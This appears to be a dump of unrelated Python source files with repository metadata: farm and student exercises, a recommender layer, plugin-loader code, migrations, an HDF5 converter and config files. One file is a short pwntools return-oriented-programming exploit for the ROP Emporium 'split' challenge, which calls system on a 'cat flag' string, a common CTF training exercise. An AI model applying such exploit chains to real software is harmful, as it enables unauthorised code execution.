super().feed()
self.vsego_kolvo_product = self.stado_state.count(self.state_animal[0]) * self.kolvo_product
print(f'Покромили, погуляли, нагуляли - {self.vsego_kolvo_product}л {self.product}')
def doika(self):
self.nadoi += self.vsego_kolvo_product
print(f'Надоили {self.vsego_kolvo_product}л {self.product}. Всего у нас {self.nadoi}л')
self.vsego_kolvo_product = 0
def sale(self, price, quant):
if quant<=self.nadoi:
print(f'Продали {quant}л. {self.product}. Получили за него {price*quant}руб.')
self.nadoi -= quant
else: print(f'{quant}л. молока мы еще не собрали. У нас всего {self.nadoi}')
# print('----------------------')
# g_dead = Goats()
# g_dead.stado_state_vsego = 'dead' # стадо мертвых коз
# print(g_dead.name, g_dead.stado_state, 'Состояние стада -', g_dead.stado_state_vsego)
# print(Goats.mro())
g = Goats() # стадо здоровых коз
g.add(7)
g.kill(2)
g.change_state(True, 2)
print('Состяние всего стада - ', g.stado_state_vsego)
g.change_state(False)
print('----------------------')
g.feed(3, 4)
g.doika()
g.navedem_poryadok()
print('Состяние всего стада - ', g.stado_state_vsego)
g.feed(5, 6)
g.doika()
g.sale(45,1000)
print('----------------------')
g.add(1)
g.feed(7, 10)
| [
"reklama.analitika@gmail.com"
] | reklama.analitika@gmail.com |
d7347ded155d726c1280eaa8b4a1b75779976483 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_169/ch167_2020_06_19_15_17_32_858494.py | a7645291dc1cbd46804f0758f0845bbdbddb6e65 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | def bairro_mais_custoso(dicionario):
dicionario2={}
lista=[]
dicionario3={}
for i in dicionario:
dicionario2[i]=0
for e in dicionario[i][6:]:
dicionario2[i]+=e
for k in dicionario2:
lista.append(dicionario2[k])
dicionario3[dicionario2[k]]=k
for e in lista:
if e == dicionario3[dicionario2[k]]:
return k
return k
| [
"you@example.com"
] | you@example.com |
a1b37413fcb03dc1ce9f772b5367868d009ee3b6 | 366c165fb54448079cf988651c92b7beab0aa36f | /Python basics/4. Полезные инструменты/hw_4_4.py | 3db80ef1d33084e5b9b36a4ad50fd60fcafde5fc | [] | no_license | Dukemegaman/python_repo | b40faaf59a293ef2afd728a44f6a1264cb39ee87 | 711ee7aee4d8ead1f30f6453a026a92ada7ec296 | refs/heads/main | 2023-07-02T06:47:05.839371 | 2021-08-11T21:19:40 | 2021-08-11T21:19:40 | 341,982,448 | 0 | 0 | null | 2021-07-02T17:30:49 | 2021-02-24T17:38:09 | Python | UTF-8 | Python | false | false | 787 | py | """
4. Представлен список чисел. Определить элементы списка, не имеющие повторений.
Сформировать итоговый массив чисел, соответствующих требованию.
Элементы вывести в порядке их следования в исходном списке.
Для выполнения задания обязательно использовать генератор.
"""
original_list = [1, 2, 3, 4, 4, 3, 5, 1, 3, 6, 1, 2, 7]
new_list = [i for i in original_list if original_list.count(i) == 1]
print("Исходные элементы списка: ", original_list)
print("Элементы списка, не имеющие повторений: ", new_list)
| [
"Dukemegaman@gmail.com"
] | Dukemegaman@gmail.com |
1ac8667987147799e4335c9a3bf5457253525894 | c8d9f656050c3ac2c601b3b0c50c448ddb176bed | /torecsys/layers/ctr/positon_bias_aware_learning_framework.py | 7a32cb411127eb1edbf675dc50a1d0714e3f247e | [
"MIT"
] | permissive | hevensun/torecsys | 207d618a5aba84d5e50d47625685037163aa22f5 | f0432e2d7652eed0fe643c1b2ef8bdf6bc1efed8 | refs/heads/master | 2022-04-11T14:04:19.829625 | 2020-03-13T08:34:20 | 2020-03-13T08:34:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,564 | py | import torch
import torch.nn as nn
from torecsys.utils.decorator import jit_experimental, no_jit_experimental_by_namedtensor
from typing import Tuple
class PositionBiasAwareLearningFrameworkLayer(nn.Module):
def __init__(self,
input_size : int,
max_num_position : int):
# refer to parent class
super(PositionBiasAwareLearningFrameworkLayer, self).__init__()
# Initialize Embedding layer
self.position_bias = nn.Embedding(max_num_position, input_size)
def forward(self, position_embed_tensor: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
r"""Forward calculation of PositionBiasAwareLearningFrameworkLayer
Args:
position_embed_tensor ((T, T)), shape = ((B, E), (B, )), dtype = (torch.float, torch.long): Embedded feature tensors of session and Position of session in sequence.
Returns:
T, shape = (B, E), dtype = torch.float: Output of PositionBiasAwareLearningFrameworkLayer
"""
# Get position bias from embedding layer
# inputs: position_embed_tensor[1], shape = (B, )
# output: position_embed, shape = (B, E)
position_embed_bias = self.position_bias(position_embed_tensor[1])
# Add position bias to input
# inputs: position_embed_tensor[0], shape = (B, E)
# inputs: position_embed_bias, shape = (B, E)
# output: output, shape = (B, E)
output = position_embed_tensor[0] + position_embed_bias
return output
| [
"p768lwy3@gmail.com"
] | p768lwy3@gmail.com |
f9ba3ed7a52583d3bf7e011dfe1d3da05108a16b | 633dd304b2ef5e55d4f62270e290877d26ac8ee8 | /stevedore/enabled.py | 87c4aa23146ac17d6c394dfc001baf3eed1b9555 | [
"Apache-2.0"
] | permissive | inteq/stevedore | aa906d8cd381fc4859f693985167bd910fd0128c | 90314340fdfaab25b29c077f8ed72c9c42900269 | refs/heads/master | 2020-12-30T17:20:24.580062 | 2012-09-15T20:25:22 | 2012-09-15T20:25:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,987 | py | import logging
from .extension import ExtensionManager
LOG = logging.getLogger(__name__)
class EnabledExtensionManager(ExtensionManager):
"""Loads only plugins that pass a check function.
The check_func should return a boolean, with ``True`` indicating
that the extension should be loaded and made available and
``False`` indicating that the extension should be ignored.
:param namespace: The namespace for the entry points.
:type namespace: str
:param check_func: Function to determine which extensions to load.
:type check_func: callable
:param invoke_on_load: Boolean controlling whether to invoke the
object returned by the entry point after the driver is loaded.
:type invoke_on_load: bool
:param invoke_args: Positional arguments to pass when invoking
the object returned by the entry point. Only used if invoke_on_load
is True.
:type invoke_args: tuple
:param invoke_kwds: Named arguments to pass when invoking
the object returned by the entry point. Only used if invoke_on_load
is True.
:type invoke_kwds: dict
"""
def __init__(self, namespace, check_func, invoke_on_load=False,
invoke_args=(), invoke_kwds={}):
self.check_func = check_func
super(EnabledExtensionManager, self).__init__(namespace,
invoke_on_load=invoke_on_load,
invoke_args=invoke_args,
invoke_kwds=invoke_kwds,
)
def _load_one_plugin(self, ep, invoke_on_load, invoke_args, invoke_kwds):
if not self.check_func(ep):
LOG.debug('ignoring extension %r', ep.name)
return None
return super(EnabledExtensionManager, self)._load_one_plugin(
ep, invoke_on_load, invoke_args, invoke_kwds,
)
| [
"doug.hellmann@dreamhost.com"
] | doug.hellmann@dreamhost.com |
e8436b928f4837ea8ff9966ee40445f15fd7e0f7 | ad66f8dd4e1ab194b83bff73c6eb45cf662a6473 | /api/views.py | 69bf2986cc3a00dfa780f6e851043b5a197c7c7c | [] | no_license | unnatic312/libray-book | af96ff1c479bc91b87b7c69b22f30cf344f97af3 | fc149a52a9c167562f51369aff856aea4e9df766 | refs/heads/master | 2022-12-23T01:27:12.839677 | 2018-04-19T09:54:35 | 2018-04-19T09:54:35 | 118,901,335 | 0 | 1 | null | 2022-12-16T02:31:42 | 2018-01-25T10:53:55 | Python | UTF-8 | Python | false | false | 717 | py | from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.viewsets import ModelViewSet
from .serializers import BookSerializer, BookReviewSerializer
from library.models import Books, BookReview
class BookSerializerViewSet(ModelViewSet):
serializer_class = BookSerializer
queryset = Books.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,)
class BookReviewSerialzerViewSet(ModelViewSet):
serializer_class = BookReviewSerializer
queryset = BookReview.objects.all()
authentication_classes = (TokenAuthentication,)
permission_classes = (IsAuthenticated,) | [
"hardik@kuwaitnet.com"
] | hardik@kuwaitnet.com |
5b04d15420f559f7c75a1cf772a31cb8aa898403 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2566/60627/239561.py | e69aa50e41e94e98b56e97cd11efa5bf495bf257 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 441 | py | # 20
n = int(input())
s = '['
for i in range(n):
inp = input()
s += ('[' + inp + '],')
s = s[:-1] + ']'
from ast import literal_eval
num = literal_eval(s)
l = []
def f(num,i,j,t):
lis = range(len(num))
global l
t += num[i][j]
if i==len(num) - 1 and j==len(num) - 1:
l.append(t)
return
if i+1 in lis:
f(num,i+1,j,t)
if j+1 in lis:
f(num,i,j+1,t)
f(num,0,0,0)
print(min(l)) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
c1da5d4f2e2d43b82c977f498ea155098ae2e99d | c77a40408bc40dc88c466c99ab0f3522e6897b6a | /Programming_basics/Exercise_1/VacationBooksList.py | 3ce9b5265267af70f22eb065be20cff43206264f | [] | no_license | vbukovska/SoftUni | 3fe566d8e9959d390a61a4845381831929f7d6a3 | 9efd0101ae496290313a7d3b9773fd5111c5c9df | refs/heads/main | 2023-03-09T17:47:20.642393 | 2020-12-12T22:14:27 | 2021-02-16T22:14:37 | 328,805,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | book_pages = int(input())
reading_speed = int(input())
time_limit = int(input())
tot_hours = book_pages / reading_speed
per_day = tot_hours / time_limit
print(per_day)
| [
"vbukovska@yahoo.com"
] | vbukovska@yahoo.com |
1189ee43148ae71e4e63174d6f48d775698a66d8 | 235c4b3aa630737b379050a420923efadd432da8 | /1stRound/Easy/599 Minimum Index Sum of Two Lists/Heap.py | 509359ed759a98a80c7b55d98f9e9ee6e90ae456 | [
"MIT"
] | permissive | ericchen12377/Leetcode-Algorithm-Python | 4e5dc20062280ef46194da5480600b2459fd89f8 | eb58cd4f01d9b8006b7d1a725fc48910aad7f192 | refs/heads/master | 2023-02-22T22:43:55.612650 | 2021-01-28T04:00:20 | 2021-01-28T04:00:20 | 258,058,468 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | import heapq
class Solution:
def findRestaurant(self, list1, list2):
"""
:type list1: List[str]
:type list2: List[str]
:rtype: List[str]
"""
interest = dict()
for i, l in enumerate(list1):
interest[l] = [i, 100000]
for j, l in enumerate(list2):
if l in interest:
interest[l][1] = j
heap = [(sum(v), l) for l, v in interest.items()]
heapq.heapify(heap)
res = []
smallest = -1
while heap:
cursum, curl = heapq.heappop(heap)
if smallest == -1:
smallest = cursum
if smallest == cursum:
res.append(curl)
else:
break
return res
list1 = ["Shogun", "Tapioca Express", "Burger King", "KFC"]
list2 = ["Piatti", "The Grill at Torrey Pines", "Hungry Hunter Steakhouse", "Shogun"]
p = Solution()
print(p.findRestaurant(list1,list2)) | [
"suiyaochen@mail.usf.edu"
] | suiyaochen@mail.usf.edu |
a9abec22d02ceaadd3c8d5c413c4e65dc1eca38d | 2056251e266b2fd57b6568e0d2effeda75229297 | /bin/instagram-py | ff3f237642242dfdcac2b729d316a00901f95880 | [
"MIT"
] | permissive | VineshChauhan24/instagram-py | 36bf477636d519207ced5d8c5f492a6513f5ea96 | 9ea84ad4019cfdfd0dc1cdc1fd5fbc7a6d9c624c | refs/heads/master | 2020-04-29T21:54:11.402814 | 2017-10-19T03:52:39 | 2017-10-19T03:52:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,049 | #!/usr/bin/env python3
#*********************************************************************************#
# MIT License #
# #
# Copyright (c) 2017 The Future Shell , DeathSec. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#*********************************************************************************#
import InstagramPy
if __name__ == '__main__':
InstagramPy.ExecuteInstagramPy()
| [
"antonyjr@protonmail.com"
] | antonyjr@protonmail.com | |
c73a6cf82b5ab0f451cbea03c6b1ea0eacf57c58 | edde97226d4040bef816466f9727c0a16acdc128 | /alembic/versions/d7b70034dca4_rename_client_id_column_name.py | dc3830df1c19fae9959f6e5ac81574b430465a42 | [] | no_license | LuisAcerv/python-microservice | 0f0656393c0b0609dfe3d7f8186ae836e773400e | f2d4315769dec8d0de1219de38c18fbc34314731 | refs/heads/master | 2022-10-09T07:45:06.901368 | 2019-09-15T19:20:06 | 2019-09-15T19:20:06 | 206,206,529 | 0 | 0 | null | 2022-09-16T18:08:44 | 2019-09-04T01:44:43 | Python | UTF-8 | Python | false | false | 529 | py | """Rename client_id column name
Revision ID: d7b70034dca4
Revises: c7fe165faa42
Create Date: 2019-09-05 00:04:03.842950
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd7b70034dca4'
down_revision = 'c7fe165faa42'
branch_labels = None
depends_on = None
def upgrade():
op.alter_column('projects', 'client_id', nullable=True, new_column_name='project_id')
def downgrade():
op.alter_column('projects', 'client_id', nullable=False, new_column_name='project_id')
| [
"l.arr.cerv@gmail.com"
] | l.arr.cerv@gmail.com |
0f0013ebec301b7d33f8b768e739afda48109e2f | 1acafcd4dd645ce460e4252152eec3375085bed4 | /Env/exhx5_gazebo/setup.py | 931e14a4e0f0f038e7a1ecfd2e202ad1b716d393 | [] | no_license | wuzy57/shixun | 4c192e0e8b1832cf7ad59153785fefc693bc1224 | 92bc2f14b19a16f06654f234a7c57c18863339ab | refs/heads/master | 2023-01-03T09:28:35.584919 | 2020-10-25T08:17:23 | 2020-10-25T08:17:23 | 306,874,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup()
d['packages'] = ['exhx5_gazebo']
d['package_dir'] = {'': 'src'}
setup(**d)
| [
"1120902512@qq.com"
] | 1120902512@qq.com |
6d36d7e25b88308e58d0b8062d820079f9529fc8 | 8f8ac99fd3ed9ceb36778b404f6fdd0b6899d3f4 | /pyobjc-framework-Metal/PyObjCTest/test_mtlaccelerationstructuretypes.py | c3bd2771327be119bf00faa1fd5e34797066345f | [
"MIT"
] | permissive | strogo/pyobjc | ac4201c7742eb75348328eeecb7eedf4e3458de3 | 2579c5eaf44b0c5af77ee195c417d2c65e72dfda | refs/heads/master | 2023-07-13T00:41:56.448005 | 2021-08-24T06:42:53 | 2021-08-24T06:42:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | import Metal
from PyObjCTools.TestSupport import TestCase
class TestMTLAccelerationStructureTypes(TestCase):
def test_structs(self):
self.assertNotHasAttr(Metal, "MTLPackedFloat3")
self.assertNotHasAttr(Metal, "MTLPackedFloat4x3")
self.assertNotHasAttr(Metal, "MTLAccelerationStructureInstanceDescriptor")
# v = Metal.MTLPackedFloat3()
# self.assertIsInstance(v.x, float)
# self.assertIsInstance(v.y, float)
# self.assertIsInstance(v.z, float)
# self.asssertNotHasattr(v, "elements")
# v = Metal.MTLPackedFloat4x3()
# self.assertHasattr(v, "columns")
# v = Metal.MTLAccelerationStructureInstanceDescriptor()
# self.assertIsInstance(v.transformationMatrix, Metal.MTLPackedFloat4x3)
# self.assertIsInstance(v.flags, int)
# self.assertIsInstance(v.mask, int)
# self.assertIsInstance(v.intersectionFunctionTableOffset, int)
# self.assertIsInstance(v.accelerationStructureIndex, int)
def test_functions(self):
# MTLPackedFloat3 is not available (See above)
self.assertNotHasAttr(Metal, "MTLPackedFloat3Make")
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
04e5c29fd3536e5ffc4f03ada2434ad4101b1362 | e9d7689655887232b652ef369c7eaf3a1ef06955 | /old/ePhy/in vivo multi/convert v3.py | 30b7047a231015b6843c8b5de6d3593611be8041 | [] | no_license | Gilles-D/main | 81ac13cdb1614eb0c82afb3d0e847a30b78cad30 | f3714d2cbe4aae22ab36f4f94c94067159270820 | refs/heads/master | 2023-08-31T06:20:48.554237 | 2023-08-30T20:33:27 | 2023-08-30T20:33:27 | 222,518,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,954 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Mar 28 11:57:30 2019
@author: lspaeth (modified by flareno)
Created on Mon Nov 12 14:14:18 2018
This class loads HdF5 recordings from MCS acquisition system as matrices of shape ((channel,data))
Allows to load Raw signals
+ associated time vectors
+ associated sampling rates
All in Volts and Seconds
Hope it will work
Then all you have to do is to load HdF5IO from eletroPy package; init class with smthg = HdF5IO(filepath)
After that u can load every instance with associated function, they are all described bellow.
"""
import matplotlib.pyplot as plt
import numpy as np
class HdF5IO:
def __init__(self,filepath):
import h5py as h5
file_ = h5.File(filepath,'r')
self.file = file_['Data'] #Loads first node
#----------RAW RECORDINGS---------------------------------------------------------------------------------------------
def raw_record(self): #Gets Raw Records as matrix ((channel,data))
raw = self.file['Recording_0']['AnalogStream']['Stream_0']['ChannelData']
import numpy as np
raw_record = np.zeros((raw.shape[0],raw.shape[1]))
raw_conv = float(self.file['Recording_0']['AnalogStream']['Stream_0']['InfoChannel'][0][10]) #Scaling Factor
for i in range(raw.shape[0]): #Stores data in new matrix
raw_record[i,:] = raw[i,:]/raw_conv #From pV to V
return raw_record
def raw_time(self): #Gets time vector for raw records
import numpy as np
raw_tick = int(self.file['Recording_0']['AnalogStream']['Stream_0']['InfoChannel'][0][9])/1000000.0 #exp6 to pass from us to s
raw_length = len(self.file['Recording_0']['AnalogStream']['Stream_0']['ChannelData'][0])
raw_time = np.arange(0,raw_length*raw_tick,raw_tick)
return raw_time
def raw_sampling_rate(self): #Gets sampling rate
raw_tick = float(self.file['Recording_0']['AnalogStream']['Stream_0']['InfoChannel'][0][9])/1000000.0
return 1.0/raw_tick #In Hz
#---------CONVERT H5 to RAW BINARY-----------------------------------------------------------------------------------
def convert_folder(folderpath, newpath, data_type='raw'):
import os, re
import numpy as np
list_dir = os.listdir(folderpath)
# folderpath = folderpath
# newpath = newpath
concatenated_file=[]
for file in list_dir:
if file.endswith('.h5'):
print ('Converting ' + file + '...')
new_path = '%s/%s'%(folderpath,file)
data = HdF5IO(new_path)
traces = data.raw_record()
concatenated_file.append(traces)
print ('Conversion DONE')
else:
print (file + ' is not an h5 file, will not be converted')
return concatenated_file
# new_path = '%s/'%(folderpath)
data = HdF5IO(new_path)
traces = data.raw_record()
# sampling_rate = int(data.raw_sampling_rate())
# name = re.sub('\.h5$', '', "concatenated")
# file_save = '%s/%s_%sHz.rbf'%(newpath,name,sampling_rate)
# with open(file_save, mode='wb') as file :
# traces.tofile(file,sep='')
# print ('Whole directory has been converted successfully')
if __name__ == '__main__':
folderpath = r'C:/Users/Gilles.DELBECQ/Desktop/In vivo Février 2022/H5/15-02'
newpath = r'C:\Users\Gilles.DELBECQ\Desktop\In vivo Février 2022\RBF/15-02'
a = convert_folder(folderpath, newpath)
array_final = np.array([])
array_final = np.concatenate(a,axis=0)
file_save = 'C:/Users/Gilles.DELBECQ/Desktop/In vivo Février 2022/H5/15-02/concatenated.rbf'
with open(file_save, mode='wb') as file :
array_final.tofile(file,sep='')
| [
"gillesdelbecq@hotmail.fr"
] | gillesdelbecq@hotmail.fr |
8fedea243147c50dffee69e5a963ed258abb7d4c | 5582a5883400cff43e1db863503f639eff64ed1d | /split/split.py | 65b0d19c7332b3a49ddcb16fb853275d586b6049 | [] | no_license | arvandy/ROP-Emporium | 581ac7cc9b35a4393caf7a449bd0803a042c5250 | 1df58eb9aa6acaaa10d71e30927ef0fa097815f7 | refs/heads/master | 2020-04-15T21:23:57.265919 | 2019-01-23T11:22:35 | 2019-01-23T11:22:35 | 165,031,651 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | #!/usr/bin/python
from pwn import *
def main():
junk = "A" * 40 # RIP Offset at 40
cat_flag = p64(0x00601060) # Radare2 command: izz
system_plt = p64(0x4005e0) # objdump -d split | grep system
pop_rdi = p64(0x0000000000400883) # python ROPgadget.py --binary split | grep rdi
p = process("./split")
payload = junk + pop_rdi + cat_flag + system_plt
p.sendlineafter(">", payload)
print p.recvall()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | arvandy.noreply@github.com |
6e4a95d5f3cdbd026d13024deb8a80eb42edccb5 | 95ea95e6a7c3ac387682bd02ba858bd8b617cd23 | /conf.py | 4446d6ae0994a62ded3b375234ce4301d320aef7 | [
"Apache-2.0"
] | permissive | josh-howes/xlearn_doc | e45714bdff4122096cd16c719b2e7b9cadc17767 | eae338f83a87f3cf6a47149dd6dbbe1f00bf2ba0 | refs/heads/master | 2020-03-25T15:42:29.219113 | 2018-04-22T08:12:51 | 2018-04-22T08:12:51 | 143,897,506 | 0 | 0 | Apache-2.0 | 2018-08-07T16:06:01 | 2018-08-07T16:06:01 | null | UTF-8 | Python | false | false | 5,101 | py | # -*- coding: utf-8 -*-
#
# xlearn_doc documentation build configuration file, created by
# sphinx-quickstart on Sun Dec 3 18:43:51 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'xLearn'
copyright = u'2017, Chao Ma'
author = u'Chao Ma'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.2.0'
# The full version, including alpha/beta/rc tags.
release = u'0.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'xlearn_docdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'xlearn_doc.tex', u'xlearn\\_doc Documentation',
u'Chao Ma', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'xlearn_doc', u'xlearn_doc Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'xlearn_doc', u'xlearn_doc Documentation',
author, 'xlearn_doc', 'One line description of project.',
'Miscellaneous'),
] | [
"mctt90@gmail.com"
] | mctt90@gmail.com |
f5432dedbe4dfd1f02e4e3417c7a2e05a7b23d29 | 4bc8f8de7c5ce4960853349a27a66df5c6d905e9 | /nimap_Proj/clients/migrations/0001_initial.py | b540785af981421572e1fcfcd51845220555a1bd | [] | no_license | saifsayed786/Project_management_example | 6a67dd432334f5ef048ded73cb7854957bf63851 | 42d5fc3969681c3e7a89fb8542eaafdaca4fd60c | refs/heads/main | 2023-06-21T23:18:59.072640 | 2021-07-21T07:50:57 | 2021-07-21T07:50:57 | 384,954,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,534 | py | # Generated by Django 3.2.5 on 2021-07-09 09:53
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Client',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('client_name', models.CharField(max_length=200)),
('created_at', models.DateTimeField(auto_now_add=True)),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('project_name', models.CharField(max_length=150)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('client_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='clientproject', to='clients.client')),
('createdBy', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"42892558+saifsayed786@users.noreply.github.com"
] | 42892558+saifsayed786@users.noreply.github.com |
2c8834ff912fd0b52c11a67b58347b14e20a59c2 | 18310e7bb4e7c46d7d3fd51046a5bd92ca5f9c48 | /gaping/parameters.py | 6509d009f0bbb6100dfbd4420f7302283a6bba73 | [] | no_license | shawwn/gaping | c91b6b4b2e2ef2ab6b868403f02e0e237b7b2761 | 41d477c79814b37f8a09715433c0c489a56c92d2 | refs/heads/master | 2023-03-15T05:42:37.086420 | 2021-03-16T21:21:01 | 2021-03-16T21:21:01 | 323,994,300 | 11 | 1 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | import gin
import gin.tf.external_configurables
import tensorflow as tf
from .util import EasyDict
@gin.configurable
def options(**kws):
return EasyDict(kws)
| [
"shawnpresser@gmail.com"
] | shawnpresser@gmail.com |
c3e44e4fb2ea664521f4b44330141e8e8974d925 | a033327958ce90eaed49dd3e12adddbc96385f4c | /Libfs/business_logic.py | f20ffd289c800f9931bb29f4078581374f5638f7 | [
"MIT"
] | permissive | cghanke/python-libfs | 623eae951791dbebc3ddd5a631522ab8bed6f24f | a6ce1b81526e30bb48b01740f425f9d059761cd9 | refs/heads/master | 2021-06-16T03:11:24.379014 | 2017-05-19T13:01:21 | 2017-05-19T13:01:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,964 | py | """
business-logic for libfs
The database contains 3 tables:
"views", "files" and "defaults".
"views" defines how the vitrual directory structure is created
"files" stores the actual information.
views has three columns:
view_name, directory_structure, filename_generator
- view_name is a string-identifier
- directory_structure is a csv-list in which order the metadata
are used to create the directory-structure.
- filename_generator is string, where %{key} is replaced by the corresponding
metadata, e.g. %{src_filename} just passes the original filename
whereas %{title} uses the title field.
"""
import errno
import logging
import os
import re
from importlib import import_module
from Libfs.misc import calltrace_logger, get_vpath_list
import json
import sys
LOGGER = logging.getLogger(__name__)
class BusinessLogic:
"""
Accessing the actual DB for the library.
"""
FILES_TABLE = "files"
VTREE_TABLE = "trees"
VIEWS_TABLE = "views"
MAGIX_TABLE = "defaults"
MAGIX_FIELD = "json"
MAGIC_KEYS = ["valid_keys", "default_view"]
DEFAULT_VIEW_NAME = "default"
